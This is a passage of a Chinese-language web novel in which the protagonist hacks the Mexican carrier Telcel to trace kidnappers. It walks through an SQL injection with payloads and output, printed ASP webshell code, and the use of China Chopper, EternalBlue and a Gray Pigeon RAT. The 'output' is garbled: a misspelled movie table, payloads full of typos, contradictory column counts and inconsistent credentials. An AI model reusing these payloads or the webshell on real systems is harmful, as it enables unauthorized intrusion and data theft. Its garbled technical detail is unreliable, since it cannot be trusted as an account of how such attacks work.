王涛是网络安全专业的毕业生。

首先想到的就是利用网络查询。

通过路口的监控摄像头确定绑匪的活动轨迹。

墨西哥城警务系统采用的是Telcel电信公司的数据网络。

入侵Telcel机房，内网渗透，目录遍历。

找到监控摄像头数据。

王涛离开酒店。

在没有监控的街角，买了20部Telcel的预充值手机。

回到酒店。

打开自己的笔记本电脑。

启动VMware Workstation虚拟机。

查询到Telcel官方网站。

点击页面的充值链接。

登录采用的是短信验证功能。

在登录界面输入’。

页面提示 “near % at line 1”。

充值数据库存在注入漏洞。

查询数据库的字段。

’order by 12# 显示Error: Unknown column 12 in order clause

第12行没有漏洞。

继续测试。

’order by 11# 显示Error: Unknown column 11 in order clause

第11行也没有漏洞。

继续测试到第9行的时候发现了漏洞。

order by 7 #

Tile Relese Chaacter Gere qwas

World War Z Gery Lne horr asxz

The Drk Kight Ries Buce Wyne action asxz

The Amazing Spider-Man Peter Paker action asxz

The Inredible Hulk Brce Banner acton asxz

The Fst ad the Furious Brian OConnor actin asxz

Iron Mn Toy Strk actin asxz

Ma of Stel Clrk Ket acion asxz

G.I. Je: Retlition Cora Commnder acton asxz

Termnator Salation Jhn Conor si-fi asxz

6个字段

继续查询可显示的字段数。

-1 union select 1,2,3,4,5,6,7 #

Tile Relase Carater Gere Ib

2 3 5 4 Lnk

2，3，4，5 为可显示字段

爆破数据库。

1 unon seect 1,daabse,3,4,5,6,7 #

Tile Reease Chaacter Gnre IMb

3 2 3 5 4 Lik 没有爆出数据库

1 unon selet 1,dtabase,3,4,5,6,7 #

Ttle Relse Chracer Gre IMb

qwas 3 5 4 Lik

库名：qwas

爆破数据库的关键内容。

-1 unon selct 1,colmn_nme,3,4,5,6,7 fom infrmation_shema.colums whee tble_scema=dataase nd tale_nme=usrs#

Tile Relese Chaacter Gere IDb

id 1 2 6 Lik

login 1 2 6 Lik

password 1 2 6 Lik

Eail 1 2 6 Lik

seret 1 2 6 Lik

actiatio_code 1 2 6 Lik

actvated 1 2 6 Lik

admin 1 2 6 Lik

一共8个字段，确定 login,admin,password

查询字段内容。

-1 union select 1,login,password,4,admin,6,7 from qwas .users#

Ttle Relese Charcter Gere IDb

B.I.M. fcf045affd0 1 Lnk

qwas fe5839c735df045affd0 1 5 Lnk

一共两个。

解密。

B. I.M. Telcel

qwas Telcel

王涛利用注入漏洞爆破出来的管理员密码。

账号：awas。

密码：Telcel。

利用管理员账号密码登录Telcel网站。

看到介绍企业文化的文章。

编辑文章，上传一句话木马。

Asp一句话木马：＜%eval requst(“xxx”)%＞。

利用“中国菜刀”连接已经上传后的一句话木马。

可以看到充值服务器的硬盘数据。

搜索局域网找到命名为“videos”的计算机。

使用米国cia的“永恒之蓝”武器库。

溢出“videos”计算机。

上传免杀后的“灰鸽子”。

看到了事发当天教堂附近监控拍下的画面。

是三辆本田REBEL500（叛逆者）上面的劫匪绑架女孩。

本田REBEL500（叛逆者）售价超过2万美元。

在人均收入3000美元的墨西哥，能承担本田REBEL500（叛逆者）价格的人数寥寥无几。

这也提醒王涛。

选择普通的代步工具可以降低被发现的概率。

绑匪离开宪法广场后，沿着公路直行。

丝毫不躲避沿途摄像头的拍摄。

遇到第一个分叉路口向右转。